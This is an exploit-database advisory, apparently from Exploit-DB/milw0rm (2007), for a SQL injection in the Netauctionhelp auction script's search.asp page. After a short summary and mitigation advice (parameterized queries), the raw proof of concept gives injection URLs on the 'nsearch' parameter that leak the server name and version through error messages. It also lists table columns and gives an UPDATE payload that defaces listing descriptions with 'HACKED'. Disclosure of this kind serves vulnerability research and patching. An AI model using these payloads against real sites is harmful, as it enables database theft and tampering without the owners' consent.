Aria-Security Net

vendor:

Netauctionhelp

by:

Aria-Security.Net

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Netauctionhelp

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The PoC provided demonstrates the SQL injection vulnerability in the search.asp page. It allows an attacker to manipulate the SQL query and retrieve sensitive information from the database. The vulnerability can be exploited by appending malicious SQL statements to the 'nsearch' parameter.

Mitigation:

To mitigate this vulnerability, it is recommended to use parameterized queries or prepared statements to handle user input securely. Additionally, input validation and proper error handling should be implemented.

Source

Exploit-DB raw data:

Aria-Security Net
http://Aria-Security.Net
------------------------
Vendor: http://www.netauctionhelp.com

PoC:
search.asp ?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--



tblAd.id
tblAd.aspectratio
tblAd.title
tblAd.imagepath
tblAd.startdate
tblAd.enddate
tblAd.id_seller
tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

this code with update itemdetl.asp?id=1


Credit goes to Aria-Security.Net
Greetz: AurA

# milw0rm.com [2007-11-22]